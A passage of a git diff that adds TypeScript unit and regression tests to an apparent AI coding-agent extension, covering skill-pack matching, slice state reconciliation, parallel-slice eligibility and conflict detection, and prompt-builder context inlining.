+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { PROJECT_FILES } from "../detection.ts";
+import { GREENFIELD_STACKS, SKILL_CATALOG, matchPacksForProject } from "../skill-catalog.ts";
+import type { ProjectSignals } from "../detection.ts";
+
+function makeSignals(overrides: Partial<ProjectSignals> = {}): ProjectSignals {
+  return {
+    detectedFiles: [],
+    isGitRepo: false,
+    isMonorepo: false,
+    xcodePlatforms: [],
+    hasCI: false,
+    hasTests: false,
+    verificationCommands: [],
+    ...overrides,
+  };
+}
+
+function packLabels(signals: ProjectSignals): string[] {
+  return matchPacksForProject(signals).map((p) => p.label);
+}
+
+// ── matchAlways packs are always included ────────────────────────────────────
+
+test("matchPacksForProject: always includes matchAlways packs", () => {
+  const labels = packLabels(makeSignals());
+  assert.ok(labels.includes("Skill Discovery"), "should include Skill Discovery");
+  assert.ok(labels.includes("Skill Authoring"), "should include Skill Authoring");
+  assert.ok(labels.includes("Browser Automation"), "should include Browser Automation");
+  assert.ok(labels.includes("Document Handling"), "should include Document Handling");
+  assert.ok(labels.includes("Code Review & Quality"), "should include Code Review & Quality");
+  assert.ok(labels.includes("Git Advanced Workflows"), "should include Git Advanced Workflows");
+});
+
+// ── Language matching ────────────────────────────────────────────────────────
+
+test("matchPacksForProject: Python language matches Python packs", () => {
+  const labels = packLabels(makeSignals({ primaryLanguage: "python", detectedFiles: ["pyproject.toml"] }));
+  assert.ok(labels.includes("Python"), "should include Python");
+  assert.ok(labels.includes("Python Advanced"), "should include Python Advanced");
+});
+
+test("matchPacksForProject: Rust language matches Rust packs", () => {
+  const labels = packLabels(makeSignals({ primaryLanguage: "rust", detectedFiles: ["Cargo.toml"] }));
+  assert.ok(labels.includes("Rust"), "should include Rust");
+  assert.ok(labels.includes("Rust Async Patterns"), "should include Rust Async Patterns");
+});
+
+test("matchPacksForProject: Go language matches Go packs", () => {
+  const labels = packLabels(makeSignals({ primaryLanguage: "go", detectedFiles: ["go.mod"] }));
+  assert.ok(labels.includes("Go"), "should include Go");
+  assert.ok(labels.includes("Go Concurrency Patterns"), "should include Go Concurrency Patterns");
+});
+
+test("matchPacksForProject: JS/TS matches web frontend packs", () => {
+  const labels = packLabels(makeSignals({ primaryLanguage: "javascript/typescript", detectedFiles: ["package.json"] }));
+  assert.ok(labels.includes("React & Web Frontend"), "should include React");
+  assert.ok(labels.includes("TypeScript & JS Development"), "should include TS/JS Dev");
+  assert.ok(labels.includes("React State & Patterns"), "should include React State");
+  assert.ok(labels.includes("shadcn/ui"), "should include shadcn");
+  assert.ok(labels.includes("Frontend Design & UX"), "should include Frontend Design");
+});
+
+// ── File matching ────────────────────────────────────────────────────────────
+
+test("matchPacksForProject: angular.json triggers Angular packs", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["angular.json"] }));
+  assert.ok(labels.includes("Angular"), "should include Angular");
+  assert.ok(labels.includes("Angular Migration"), "should include Angular Migration");
+});
+
+test("matchPacksForProject: next.config.ts triggers Next.js packs", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["next.config.ts"] }));
+  assert.ok(labels.includes("Next.js"), "should include Next.js");
+  assert.ok(labels.includes("Next.js App Router Patterns"), "should include Next.js App Router");
+});
+
+test("matchPacksForProject: *.vue triggers Vue.js", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["*.vue"] }));
+  assert.ok(labels.includes("Vue.js"), "should include Vue.js");
+});
+
+test("matchPacksForProject: Chart.yaml triggers Kubernetes", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["Chart.yaml"] }));
+  assert.ok(labels.includes("Kubernetes"), "should include Kubernetes");
+});
+
+test("matchPacksForProject: hardhat.config.ts triggers Blockchain", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["hardhat.config.ts"] }));
+  assert.ok(labels.includes("Blockchain & Web3"), "should include Blockchain & Web3");
+});
+
+test("matchPacksForProject: tailwind.config.ts triggers Tailwind CSS", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["tailwind.config.ts"] }));
+  assert.ok(labels.includes("Tailwind CSS"), "should include Tailwind CSS");
+});
+
+// ── Xcode platform matching ─────────────────────────────────────────────────
+
+test("matchPacksForProject: iphoneos triggers iOS packs", () => {
+  const labels = packLabels(makeSignals({ xcodePlatforms: ["iphoneos"] }));
+  assert.ok(labels.includes("iOS App Frameworks"), "should include iOS App Frameworks");
+  assert.ok(labels.includes("iOS Data Frameworks"), "should include iOS Data Frameworks");
+  assert.ok(labels.includes("iOS AI & ML"), "should include iOS AI & ML");
+  assert.ok(labels.includes("iOS Engineering"), "should include iOS Engineering");
+  assert.ok(labels.includes("iOS Hardware"), "should include iOS Hardware");
+  assert.ok(labels.includes("iOS Platform"), "should include iOS Platform");
+});
+
+// ── Isolation checks — packs that should NOT match ──────────────────────────
+
+test("matchPacksForProject: FastAPI does not match generic Python", () => {
+  const labels = packLabels(makeSignals({ primaryLanguage: "python", detectedFiles: ["pyproject.toml"] }));
+  assert.ok(!labels.includes("FastAPI"), "FastAPI should NOT match generic Python projects");
+});
+
+test("matchPacksForProject: FastAPI matches when dep:fastapi detected", () => {
+  const labels = packLabels(makeSignals({ primaryLanguage: "python", detectedFiles: ["pyproject.toml", "dep:fastapi"] }));
+  assert.ok(labels.includes("FastAPI"), "FastAPI should match when dep:fastapi is in detectedFiles");
+});
+
+test("matchPacksForProject: Spring Boot does not match via language alone", () => {
+  // Simulate Android project: has java/kotlin language but no root pom.xml/build.gradle
+  const labels = packLabels(makeSignals({ primaryLanguage: "java/kotlin", detectedFiles: ["app/build.gradle"] }));
+  assert.ok(!labels.includes("Java & Spring Boot"), "Spring Boot should NOT match via language alone");
+});
+
+test("matchPacksForProject: Spring Boot matches only dep:spring-boot", () => {
+  const positive = packLabels(makeSignals({ detectedFiles: ["dep:spring-boot"] }));
+  assert.ok(positive.includes("Java & Spring Boot"), "should include Spring Boot pack when dependency marker exists");
+
+  const androidLike = packLabels(makeSignals({ detectedFiles: ["build.gradle", "app/build.gradle"], primaryLanguage: "java/kotlin" }));
+  assert.ok(!androidLike.includes("Java & Spring Boot"), "generic Gradle + Android markers should not imply Spring Boot");
+});
+
+test("matchPacksForProject: Unity does not include Godot", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["ProjectSettings/ProjectVersion.txt"] }));
+  assert.ok(labels.includes("Unity"), "should include Unity");
+  assert.ok(!labels.includes("Godot"), "should NOT include Godot");
+});
+
+test("matchPacksForProject: Godot does not include Unity", () => {
+  const labels = packLabels(makeSignals({ detectedFiles: ["project.godot"] }));
+  assert.ok(labels.includes("Godot"), "should include Godot");
+  assert.ok(!labels.includes("Unity"), "should NOT include Unity");
+});
+
+test("matchPacksForProject: .NET backend patterns match F# and solution markers", () => {
+  const fsprojLabels = packLabels(makeSignals({ detectedFiles: ["*.fsproj"], primaryLanguage: "fsharp" }));
+  assert.ok(fsprojLabels.includes(".NET Backend Patterns"), "should include generic .NET backend patterns for F# projects");
+  assert.ok(!fsprojLabels.includes(".NET & C#"), "should not include C#-specific pack for F# projects");
+
+  const slnLabels = packLabels(makeSignals({ detectedFiles: ["*.sln"], primaryLanguage: "dotnet" }));
+  assert.ok(slnLabels.includes(".NET Backend Patterns"), "should include generic .NET backend patterns for solution files");
+});
+
+test("SKILL_CATALOG: every matchFiles entry is backed by detection", () => {
+  const knownMarkers = new Set<string>([
+    ...PROJECT_FILES,
+    "*.sqlite",
+    "*.sql",
+    "*.csproj",
+    "*.fsproj",
+    "*.sln",
+    "*.vue",
+    "dep:fastapi",
+    "dep:spring-boot",
+  ]);
+
+  for (const pack of SKILL_CATALOG) {
+    for (const marker of pack.matchFiles ?? []) {
+      assert.ok(knownMarkers.has(marker), `Unknown detection marker: ${marker} (pack: ${pack.label})`);
+    }
+  }
+});
+
+test("GREENFIELD_STACKS: every pack label resolves to SKILL_CATALOG", () => {
+  const labels = new Set(SKILL_CATALOG.map((pack) => pack.label));
+
+  for (const stack of GREENFIELD_STACKS) {
+    for (const packLabel of stack.packs) {
+      assert.ok(labels.has(packLabel), `Unknown pack label: ${packLabel} (stack: ${stack.id})`);
+    }
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/skip-slice-state-rebuild.test.ts b/src/resources/extensions/gsd/tests/skip-slice-state-rebuild.test.ts
new file mode 100644
index 000000000..5a46cdf3c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/skip-slice-state-rebuild.test.ts
@@ -0,0 +1,31 @@
+/**
+ * Regression test for #3477: gsd_skip_slice tool must rebuild STATE.md
+ * after updating the DB so auto-mode reads the correct state.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+test("gsd_skip_slice tool calls rebuildState after DB update (#3477)", () => {
+  const src = readFileSync(
+    join(import.meta.dirname, "..", "bootstrap", "db-tools.ts"),
+    "utf-8",
+  );
+  // The fix adds a rebuildState call after updateSliceStatus in skip_slice
+  assert.ok(
+    src.includes("rebuildState"),
+    "gsd_skip_slice must call rebuildState after updating slice status",
+  );
+});
+
+test("rethink prompt warns against markdown-only edits for skip (#3477)", () => {
+  const prompt = readFileSync(
+    join(import.meta.dirname, "..", "prompts", "rethink.md"),
+    "utf-8",
+  );
+  assert.ok(
+    prompt.includes("MUST") && prompt.includes("gsd_skip_slice"),
+    "Rethink prompt must emphasize gsd_skip_slice tool requirement",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/skipped-validation-completion.test.ts b/src/resources/extensions/gsd/tests/skipped-validation-completion.test.ts
new file mode 100644
index 000000000..927eb3a57
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/skipped-validation-completion.test.ts
@@ -0,0 +1,39 @@
+/**
+ * Regression test for #3698 — allow milestone completion when validation
+ * was skipped by preference
+ *
+ * When validation is skipped due to user preference (e.g. budget profile),
+ * auto-dispatch should recognize the "skipped by preference" pattern and
+ * allow completion instead of treating it as a missing validation.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const autoDispatchSrc = readFileSync(
+  join(__dirname, '..', 'auto-dispatch.ts'),
+  'utf-8',
+);
+
+describe('skipped validation completion (#3698)', () => {
+  test('skippedByPreference regex detection exists', () => {
+    assert.match(autoDispatchSrc, /skippedByPreference/,
+      'skippedByPreference variable should exist in auto-dispatch.ts');
+  });
+
+  test('regex matches skip-by-preference patterns', () => {
+    assert.match(autoDispatchSrc, /skip\(\?:ped\)\?\[\\s\\-\]\+\(\?:by\|per\|due to\)/,
+      'should have regex matching "skipped by/per/due to" patterns');
+  });
+
+  test('skippedByPreference feeds into operational check', () => {
+    assert.match(autoDispatchSrc, /hasOperationalCheck\s*=\s*skippedByPreference/,
+      'skippedByPreference should be part of hasOperationalCheck');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/slice-context-injection.test.ts b/src/resources/extensions/gsd/tests/slice-context-injection.test.ts
new file mode 100644
index 000000000..bb7cd2005
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/slice-context-injection.test.ts
@@ -0,0 +1,50 @@
+/**
+ * Regression test: S##-CONTEXT.md from slice discussion must be
+ * injected into all 5 downstream prompt builders (#3452).
+ *
+ * Scans auto-prompts.ts for the 5 builder functions and verifies
+ * each one resolves and inlines the slice-level CONTEXT file.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const autoPromptsPath = join(__dirname, "..", "auto-prompts.ts");
+const source = readFileSync(autoPromptsPath, "utf-8");
+
+const BUILDERS = [
+  "buildResearchSlicePrompt",
+  "buildPlanSlicePrompt",
+  "buildCompleteSlicePrompt",
+  "buildReplanSlicePrompt",
+  "buildReassessRoadmapPrompt",
+];
+
+describe("slice CONTEXT.md injection into prompt builders (#3452)", () => {
+  for (const builder of BUILDERS) {
+    test(`${builder} resolves slice CONTEXT file`, () => {
+      // Find the function body
+      const fnStart = source.indexOf(`export async function ${builder}`);
+      assert.ok(fnStart !== -1, `${builder} should exist in auto-prompts.ts`);
+
+      // Get a reasonable chunk after the function start (enough to cover the inlining section)
+      const chunk = source.slice(fnStart, fnStart + 3000);
+
+      // Must resolve the slice CONTEXT path
+      assert.ok(
+        chunk.includes('resolveSliceFile(base, mid,') && chunk.includes('"CONTEXT"'),
+        `${builder} should call resolveSliceFile with "CONTEXT"`,
+      );
+
+      // Must inline it with inlineFileOptional
+      assert.ok(
+        chunk.includes('Slice Context'),
+        `${builder} should inline slice CONTEXT with a "Slice Context" label`,
+      );
+    });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/slice-disk-reconcile.test.ts b/src/resources/extensions/gsd/tests/slice-disk-reconcile.test.ts
new file mode 100644
index 000000000..a40822d29
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/slice-disk-reconcile.test.ts
@@ -0,0 +1,233 @@
+/**
+ * slice-disk-reconcile.test.ts — #2533
+ *
+ * Slices that exist on disk (in ROADMAP.md) but are missing from the SQLite
+ * database cause permanent "No slice eligible — check dependency ordering"
+ * blocks. deriveStateFromDb must reconcile disk slices into the DB, just as
+ * it already does for milestones (#2416).
+ *
+ * Scenario: M001 has a ROADMAP with S01-S04. S01 and S02 have SUMMARY files
+ * (complete on disk). S03 depends on S01. Only S04 is in the DB (depends on
+ * S03). Without slice reconciliation, S01-S03 are invisible and S04 is
+ * permanently blocked.
+ */
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { deriveStateFromDb, invalidateStateCache } from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  getMilestoneSlices,
+} from "../gsd-db.ts";
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-slice-reconcile-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, ".gsd", relativePath);
+  mkdirSync(join(full, ".."), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+const CONTEXT_CONTENT = `# M001: Test Milestone
+
+This milestone tests slice reconciliation.
+
+## Must-Haves
+- Something important
+`;
+
+// Roadmap with 4 slices: S01 (no deps), S02 (no deps), S03 (depends S01), S04 (depends S03)
+const ROADMAP_CONTENT = `# M001: Test Milestone
+
+**Vision:** Test slice disk→DB reconciliation.
+
+## Slices
+
+- [x] **S01: Foundation** \`risk:low\` \`depends:[]\`
+  > Set up project structure.
+- [x] **S02: Core Utils** \`risk:low\` \`depends:[]\`
+  > Build utility functions.
+- [ ] **S03: Integration** \`risk:medium\` \`depends:[S01]\`
+  > Integrate components.
+- [ ] **S04: Final Assembly** \`risk:high\` \`depends:[S03]\`
+  > Assemble everything.
+`;
+
+async function testMissingSlicesCauseBlock(): Promise<void> {
+  console.log("\n--- Test: missing DB slices cause permanent block (pre-fix) ---");
+
+  const base = createFixtureBase();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  try {
+    openDatabase(dbPath);
+
+    // M001 in DB
+    insertMilestone({ id: "M001", title: "M001: Test Milestone", status: "active", depends_on: [] });
+
+    // Only S04 is in the DB — S01-S03 are missing
+    insertSlice({ id: "S04", milestoneId: "M001", title: "S04: Final Assembly", status: "pending", risk: "high", depends: ["S03"] });
+
+    // Write disk files — S01 and S02 have SUMMARY (complete on disk)
+    writeFile(base, "milestones/M001/CONTEXT.md", CONTEXT_CONTENT);
+    writeFile(base, "milestones/M001/ROADMAP.md", ROADMAP_CONTENT);
+    writeFile(base, "milestones/M001/S01/PLAN.md", "# S01 Plan\n");
+    writeFile(base, "milestones/M001/S01/SUMMARY.md", "# S01 Summary\nDone.");
+    writeFile(base, "milestones/M001/S02/PLAN.md", "# S02 Plan\n");
+    writeFile(base, "milestones/M001/S02/SUMMARY.md", "# S02 Summary\nDone.");
+    writeFile(base, "milestones/M001/S03/PLAN.md", "# S03 Plan\n");
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    // After the fix, slices S01-S03 should be reconciled into DB
+    const dbSlices = getMilestoneSlices("M001");
+    assertTrue(
+      dbSlices.length === 4,
+      `All 4 roadmap slices should be in DB after reconciliation, got ${dbSlices.length}`,
+    );
+
+    // S01 and S02 should be marked complete (have SUMMARY files)
+    const s01 = dbSlices.find(s => s.id === "S01");
+    assertTrue(s01 !== undefined, "S01 should exist in DB after reconciliation");
+    if (s01) {
+      assertEq(s01.status, "complete", "S01 should be 'complete' (has SUMMARY on disk)");
+    }
+
+    const s02 = dbSlices.find(s => s.id === "S02");
+    assertTrue(s02 !== undefined, "S02 should exist in DB after reconciliation");
+    if (s02) {
+      assertEq(s02.status, "complete", "S02 should be 'complete' (has SUMMARY on disk)");
+    }
+
+    // S03 should be pending (no SUMMARY)
+    const s03 = dbSlices.find(s => s.id === "S03");
+    assertTrue(s03 !== undefined, "S03 should exist in DB after reconciliation");
+    if (s03) {
+      assertEq(s03.status, "pending", "S03 should be 'pending' (no SUMMARY on disk)");
+    }
+
+    // The state should NOT be blocked — S03 should be eligible (S01 dep satisfied)
+    assertTrue(
+      state.phase !== "blocked",
+      `Phase should not be 'blocked' after reconciliation, got '${state.phase}'`,
+    );
+
+    // Active slice should be S03 (S01 dep met, S03 is first incomplete with satisfied deps)
+    assertTrue(
+      state.activeSlice !== null,
+      "There should be an active slice after reconciliation",
+    );
+    if (state.activeSlice) {
+      assertEq(
+        state.activeSlice.id,
+        "S03",
+        "Active slice should be S03 (its dependency S01 is complete) (#2533)",
+      );
+    }
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+}
+
+async function testSliceReconciliationIdempotent(): Promise<void> {
+  console.log("\n--- Test: slice reconciliation is idempotent ---");
+
+  const base = createFixtureBase();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  try {
+    openDatabase(dbPath);
+
+    insertMilestone({ id: "M001", title: "M001: Test", status: "active", depends_on: [] });
+    // S01 already in DB with correct status
+    insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Foundation", status: "complete", depends: [] });
+
+    writeFile(base, "milestones/M001/CONTEXT.md", CONTEXT_CONTENT);
+    writeFile(base, "milestones/M001/ROADMAP.md", ROADMAP_CONTENT);
+    writeFile(base, "milestones/M001/S01/PLAN.md", "# S01 Plan\n");
+    writeFile(base, "milestones/M001/S01/SUMMARY.md", "# S01 Summary\nDone.");
+    writeFile(base, "milestones/M001/S02/PLAN.md", "# S02 Plan\n");
+    writeFile(base, "milestones/M001/S02/SUMMARY.md", "# S02 Summary\nDone.");
+
+    invalidateStateCache();
+    await deriveStateFromDb(base);
+
+    // S01 should still be complete (not overwritten)
+    const dbSlices = getMilestoneSlices("M001");
+    const s01 = dbSlices.find(s => s.id === "S01");
+    assertTrue(s01 !== undefined, "S01 should still exist in DB");
+    if (s01) {
+      assertEq(s01.status, "complete", "S01 status should remain 'complete' (not overwritten)");
+    }
+
+    // S02-S04 should have been added
+    assertTrue(
+      dbSlices.length === 4,
+      `Should have 4 slices after reconciliation (existing + new), got ${dbSlices.length}`,
+    );
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+}
+
+async function testNoRoadmapSkipsReconciliation(): Promise<void> {
+  console.log("\n--- Test: no ROADMAP file skips slice reconciliation ---");
+
+  const base = createFixtureBase();
+  const dbPath = join(base, ".gsd", "gsd.db");
+
+  try {
+    openDatabase(dbPath);
+
+    insertMilestone({ id: "M001", title: "M001: No Roadmap", status: "active", depends_on: [] });
+
+    // Only a CONTEXT file, no ROADMAP
+    writeFile(base, "milestones/M001/CONTEXT.md", CONTEXT_CONTENT);
+
+    invalidateStateCache();
+    const state = await deriveStateFromDb(base);
+
+    const dbSlices = getMilestoneSlices("M001");
+    assertEq(dbSlices.length, 0, "No slices should be added when no ROADMAP exists");
+
+    // Should be in pre-planning (no roadmap)
+    assertEq(state.phase, "pre-planning", "Phase should be pre-planning with no roadmap");
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+}
+
+async function main(): Promise<void> {
+  console.log("\n=== #2533: deriveStateFromDb reconciles disk slices ===");
+
+  await testMissingSlicesCauseBlock();
+  await testSliceReconciliationIdempotent();
+  await testNoRoadmapSkipsReconciliation();
+
+  report();
+}
+
+main().catch((err) => {
+  console.error(err);
+  process.exit(1);
+});
diff --git a/src/resources/extensions/gsd/tests/slice-parallel-conflict.test.ts b/src/resources/extensions/gsd/tests/slice-parallel-conflict.test.ts
new file mode 100644
index 000000000..375774215
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/slice-parallel-conflict.test.ts
@@ -0,0 +1,92 @@
+/**
+ * Tests for slice-level parallel conflict detection.
+ * Verifies hasFileConflict() correctly identifies when two slices
+ * touch too many of the same files to safely run in parallel.
+ */
+
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+import { hasFileConflict } from "../slice-parallel-conflict.js";
+
+// ─── Helpers ──────────────────────────────────────────────────────────────────
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-slice-conflict-test-"));
+  mkdirSync(join(base, ".gsd"), { recursive: true });
+  return base;
+}
+
+function writeSlicePlan(base: string, mid: string, sid: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, "PLAN.md"), content, "utf-8");
+}
+
+describe("hasFileConflict", () => {
+  let base: string;
+
+  beforeEach(() => {
+    base = makeTmpBase();
+  });
+
+  afterEach(() => {
+    rmSync(base, { recursive: true, force: true });
+  });
+
+  it("two slices with >5 overlapping file paths → blocked (true)", () => {
+    const planA = `# Plan S01
+## Tasks
+- T01: Update src/auth/login.ts
+- T02: Update src/auth/register.ts
+- T03: Update src/auth/session.ts
+- T04: Update src/auth/middleware.ts
+- T05: Update src/auth/types.ts
+- T06: Update src/auth/utils.ts
+`;
+    const planB = `# Plan S02
+## Tasks
+- T01: Refactor src/auth/login.ts
+- T02: Refactor src/auth/register.ts
+- T03: Refactor src/auth/session.ts
+- T04: Refactor src/auth/middleware.ts
+- T05: Refactor src/auth/types.ts
+- T06: Refactor src/auth/utils.ts
+`;
+    writeSlicePlan(base, "M001", "S01", planA);
+    writeSlicePlan(base, "M001", "S02", planB);
+    assert.equal(hasFileConflict(base, "M001", "S01", "S02"), true);
+  });
+
+  it("two slices with 0 overlapping paths → allowed (false)", () => {
+    const planA = `# Plan S01
+## Tasks
+- T01: Create src/api/routes.ts
+- T02: Create src/api/handlers.ts
+`;
+    const planB = `# Plan S02
+## Tasks
+- T01: Create src/ui/components.ts
+- T02: Create src/ui/styles.ts
+`;
+    writeSlicePlan(base, "M001", "S01", planA);
+    writeSlicePlan(base, "M001", "S02", planB);
+    assert.equal(hasFileConflict(base, "M001", "S01", "S02"), false);
+  });
+
+  it("missing PLAN.md → conservative block (true)", () => {
+    // Only create one slice's plan
+    writeSlicePlan(base, "M001", "S01", "# Plan\n- T01: src/foo.ts");
+    // S02 has no plan at all
+    assert.equal(hasFileConflict(base, "M001", "S01", "S02"), true);
+  });
+
+  it("one slice empty plan → allowed (false)", () => {
+    writeSlicePlan(base, "M001", "S01", "# Plan S01\n## Tasks\n- T01: Create src/foo.ts");
+    writeSlicePlan(base, "M001", "S02", "# Plan S02\n## Tasks\n(no tasks yet)");
+    assert.equal(hasFileConflict(base, "M001", "S01", "S02"), false);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/slice-parallel-eligibility.test.ts b/src/resources/extensions/gsd/tests/slice-parallel-eligibility.test.ts
new file mode 100644
index 000000000..9beded51e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/slice-parallel-eligibility.test.ts
@@ -0,0 +1,95 @@
+/**
+ * Tests for slice-level parallel eligibility.
+ * Verifies getEligibleSlices() correctly determines which slices
+ * can run in parallel based on dependency satisfaction.
+ */
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+
+import { getEligibleSlices } from "../slice-parallel-eligibility.js";
+
+describe("getEligibleSlices", () => {
+  it("diamond DAG: S01 done, S02 depends:[S01], S03 depends:[S01] → both eligible", () => {
+    const slices = [
+      { id: "S01", done: true, depends: [] },
+      { id: "S02", done: false, depends: ["S01"] },
+      { id: "S03", done: false, depends: ["S01"] },
+    ];
+    const completed = new Set(["S01"]);
+    const result = getEligibleSlices(slices, completed);
+    const ids = result.map(s => s.id);
+    assert.deepStrictEqual(ids.sort(), ["S02", "S03"]);
+  });
+
+  it("linear chain: S01→S02→S03, only S01 done → only S02 eligible", () => {
+    const slices = [
+      { id: "S01", done: true, depends: [] },
+      { id: "S02", done: false, depends: ["S01"] },
+      { id: "S03", done: false, depends: ["S02"] },
+    ];
+    const completed = new Set(["S01"]);
+    const result = getEligibleSlices(slices, completed);
+    assert.equal(result.length, 1);
+    assert.equal(result[0].id, "S02");
+  });
+
+  it("no deps declared: S01 done, S02 no deps, S03 no deps → only S02 eligible (positional fallback)", () => {
+    const slices = [
+      { id: "S01", done: true, depends: [] },
+      { id: "S02", done: false, depends: [] },
+      { id: "S03", done: false, depends: [] },
+    ];
+    const completed = new Set(["S01"]);
+    const result = getEligibleSlices(slices, completed);
+    // Positional fallback: when no deps declared, only the first non-done slice
+    // after all positionally-earlier slices are done is eligible
+    assert.equal(result.length, 1);
+    assert.equal(result[0].id, "S02");
+  });
+
+  it("all done: empty result", () => {
+    const slices = [
+      { id: "S01", done: true, depends: [] },
+      { id: "S02", done: true, depends: ["S01"] },
+      { id: "S03", done: true, depends: ["S02"] },
+    ];
+    const completed = new Set(["S01", "S02", "S03"]);
+    const result = getEligibleSlices(slices, completed);
+    assert.equal(result.length, 0);
+  });
+
+  it("empty input: empty result", () => {
+    const result = getEligibleSlices([], new Set());
+    assert.equal(result.length, 0);
+  });
+
+  it("mixed deps and no-deps: only dep-satisfied slices with explicit deps are eligible alongside positional", () => {
+    const slices = [
+      { id: "S01", done: true, depends: [] },
+      { id: "S02", done: false, depends: ["S01"] },  // explicit dep satisfied
+      { id: "S03", done: false, depends: [] },         // no deps, positional fallback
+      { id: "S04", done: false, depends: ["S01"] },  // explicit dep satisfied
+    ];
+    const completed = new Set(["S01"]);
+    const result = getEligibleSlices(slices, completed);
+    const ids = result.map(s => s.id);
+    // S02 and S04 have explicit deps satisfied; S03 has no deps but
+    // positionally S02 (before it) is not done, so S03 is blocked by positional rule
+    assert.ok(ids.includes("S02"), "S02 should be eligible (dep on S01 satisfied)");
+    assert.ok(ids.includes("S04"), "S04 should be eligible (dep on S01 satisfied)");
+  });
+
+  it("unsatisfied dependency blocks slice", () => {
+    const slices = [
+      { id: "S01", done: false, depends: [] },
+      { id: "S02", done: false, depends: ["S01"] },
+    ];
+    const completed = new Set<string>();
+    const result = getEligibleSlices(slices, completed);
+    // S01 has no deps and is first → eligible by positional
+    // S02 depends on S01 which is not completed → blocked
+    assert.equal(result.length, 1);
+    assert.equal(result[0].id, "S01");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/slice-parallel-orchestrator.test.ts b/src/resources/extensions/gsd/tests/slice-parallel-orchestrator.test.ts
new file mode 100644
index 000000000..8592f2c39
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/slice-parallel-orchestrator.test.ts
@@ -0,0 +1,83 @@
+/**
+ * Structural tests for slice-level parallel orchestrator.
+ * Verifies the orchestrator module exists and has the correct shape,
+ * env var usage, and preference gating.
+ */
+
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+describe("slice-parallel-orchestrator structural tests", () => {
+  it("orchestrator uses GSD_SLICE_LOCK env var", () => {
+    const source = readFileSync(join(gsdDir, "slice-parallel-orchestrator.ts"), "utf-8");
+    assert.ok(
+      source.includes("GSD_SLICE_LOCK"),
+      "Orchestrator must use GSD_SLICE_LOCK env var to isolate slice workers",
+    );
+  });
+
+  it("orchestrator sets GSD_PARALLEL_WORKER=1 to prevent nesting", () => {
+    const source = readFileSync(join(gsdDir, "slice-parallel-orchestrator.ts"), "utf-8");
+    assert.ok(
+      source.includes("GSD_PARALLEL_WORKER"),
+      "Orchestrator must set GSD_PARALLEL_WORKER to prevent nested parallel",
+    );
+  });
+
+  it("maxWorkers default is 2", () => {
+    const source = readFileSync(join(gsdDir, "slice-parallel-orchestrator.ts"), "utf-8");
+    // Check that default max workers is 2 (in opts.maxWorkers ?? 2 or similar)
+    assert.ok(
+      source.includes("maxWorkers") && source.includes("2"),
+      "Default maxWorkers should be 2",
+    );
+  });
+
+  it("orchestrator imports GSD_MILESTONE_LOCK for milestone isolation", () => {
+    const source = readFileSync(join(gsdDir, "slice-parallel-orchestrator.ts"), "utf-8");
+    assert.ok(
+      source.includes("GSD_MILESTONE_LOCK"),
+      "Orchestrator must also pass GSD_MILESTONE_LOCK for milestone context",
+    );
+  });
+});
+
+describe("slice_parallel preference gating", () => {
+  it("preferences-types.ts includes slice_parallel in interface", () => {
